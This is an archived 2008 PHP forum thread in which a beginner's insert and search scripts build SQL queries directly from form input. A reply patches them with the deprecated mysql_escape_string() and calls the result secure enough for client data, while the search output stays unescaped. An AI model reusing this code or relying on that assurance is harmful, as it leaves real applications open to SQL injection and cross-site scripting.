Scud Posted March 23, 2008 Share Posted March 23, 2008 Hi guys; after a day of experimenting i finally got it all to work, i am now able to add records to my database through html field and i can not search for a usercode in a html field and it will bring up the matching record. Now i am happy, or at least i thought i would be. I made an earlier post and another guy mentioned to make sure the database entries, viewing and so on are secure, something about mysql injections and so on. I am still new to all this and therefore i have no idea what this is, regardless i would like my ste to be secure as possible, at the moment it is as follows; insert.php: <?php $con = mysql_connect("localhost","user","password"); if (!$con) { die('Could not connect: ' . mysql_error()); }mysql_select_db("mydata", $con);$sql="INSERT INTO my table(var1, var2, var3, var4, var5, var6) VALUES ('$_POST[var1]','$_POST[var2]','$_POST[var3]','$_POST[var4]','$_POST[var5]','$_POST[var6]')";if (!mysql_query($sql,$con)) { die('Error: ' . mysql_error()); } echo "Record has been added";mysql_close($con) ?> an insert from my index page: <td colspan="4" background="http://www.mysite.com.au/images/index_13.gif"><form action="insert.php" method="post"> <table width="541" border="0" align="center"> <tr> <td width="69"><div align="right"><span class="style2">CustomerName:*</span></div></td> <td width="151"><label> <input type="text" name="var1" id="var1" tabindex="1" /> </label></td> <td width="175" class="style2"><div align="right">Store:*</div></td> <td width="128"><label> <input type="text" name="var2" id="var2" tabindex="2"/> </label></td> </tr> <tr> <td class="style2"><div align="right">Code*</div></td> <td><label> <input type="text" name="var3" id="var3" tabindex="3"/> </label></td> <td class="style2"><div align="right">Status*:</div></td> <td><label> <select id="anrede" name="var4" tabindex="4" onFocus="FocusCol(this)" onBlur="BlurCol(this)" tabindex="4"/> <option value="Complete - Awaiting Pick-Up" selected>Complete</option> <option value="Not Yet Complete. Please Check Back Soon" selected>Uncomplete</option> </select> </label></td> </tr> <tr> <td class="style2"><div align="right">Notes*</div></td> <td><label> <input type="text" name="var5" id="var5" tabindex="5"/> </label></td> <td class="style2"><div align="right">Staff Member*</div></td> <td><label> <input type="text" name="var6" id="var6" tabindex="5"/> </label></td> </tr> </table> <label></label> <div align="center"> <input name="button" type="submit" id="button" value="Submit" tabindex="13"/> </div> </form></td> now to read database entries findcode.php file <?php $q=$_GET["q"]; $con = mysql_connect("localhost","username","password"); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("mydb", $con); $result = mysql_query("SELECT * FROM tabel WHERE row='$q'"); while($row = mysql_fetch_array($result)) { echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3'] . " Notes: " . $row['var4'] . " Status: " . $row['var5']; echo " "; } ?> <html> <head> <script src="selectuser.js"></script> </head> <body><form name="form" action="findcode.php" method="get"> <input type="text" name="q" /> <input type="submit" name="Submit" value="Search" /> </form></body> </html> thanks guy, hopefully its secure enough for me not to have to make alteration... looking forward to feedback ,thanks in advance (edited by kenrbnsn to change the tags to tags) Link to comment https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/ Share on other sites More sharing options...
uniflare Posted March 24, 2008 Share Posted March 24, 2008 mysql injection is quite simple to overcome, all you need to do (imo), is use mysql_escape_string() on any string you are using in a query, like field names, or field values or table names etc. eg; <?php $q=$_GET["q"]; $con = mysql_connect("localhost","username","password"); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("mydb", $con); $result = mysql_query("SELECT * FROM tabel WHERE row='$q'"); while($row = mysql_fetch_array($result)) { echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3'] . " Notes: " . $row['var4'] . " Status: " . $row['var5']; echo " "; } ?> <html> <head> <script src="selectuser.js"></script> </head> <body><form name="form" action="findcode.php" method="get"> <input type="text" name="q" /> <input type="submit" name="Submit" value="Search" /> </form></body> </html> the above code should be written as; <?php $q=$_GET["q"]; $con = mysql_connect("localhost","username","password"); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("mydb", $con); $result = mysql_query("SELECT * FROM tabel WHERE row='".mysql_escape_string($q)."'"); while($row = mysql_fetch_array($result)) { echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3'] . " Notes: " . $row['var4'] . " Status: " . $row['var5']; echo " "; } ?> <html> <head> <script src="selectuser.js"></script> </head> <body><form name="form" action="findcode.php" method="get"> <input type="text" name="q" /> <input type="submit" name="Submit" value="Search" /> </form></body> </html> and insert.php should be; <?php $con = mysql_connect("localhost","user","password"); if (!$con) { die('Could not connect: ' . mysql_error()); }mysql_select_db("mydata", $con);$sql="INSERT INTO my table(var1, var2, var3, var4, var5, var6) VALUES ('".mysql_escape_string($_POST[var1])."','".mysql_escape_string($_POST[var2])."','".mysql_escape_string($_POST[var3])."','".mysql_escape_string($_POST[var4])."','".mysql_escape_string($_POST[var5])."','".mysql_escape_string($_POST[var6])."')";if (!mysql_query($sql,$con)) { die('Error: ' . mysql_error()); } echo "Record has been added";mysql_close($con) ?> hope this helps, Link to comment https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/#findComment-499136 Share on other sites More sharing options...
Scud Posted March 24, 2008 Author Share Posted March 24, 2008 thank you very much for that, much appreciated. so you would think that is pretty secure with that escape string? any other suggestions? i want it to be as tight as possible Link to comment https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/#findComment-499237 Share on other sites More sharing options...
Scud Posted April 16, 2008 Author Share Posted April 16, 2008 is the above script, with the mysql injection script secure enough to handle client information? Link to comment https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/#findComment-518413 Share on other sites More sharing options...
uniflare Posted April 20, 2008 Share Posted April 20, 2008 i would say it is yes. If your a going to be storing costomer credit card numbers etc you will need to read up on the laws of your country, If your just temporarily using he credit card numbers you should always use SSL encrypted connections. For general website security you should always use mysql_escape_string() on any mysql query values, and also use htmlentities() (or similar function) on all data displayed on your website that you dont wish HTML/Javascript to be run (eg, usernames/signatures/profiles etc). Link to comment https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/#findComment-521767 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.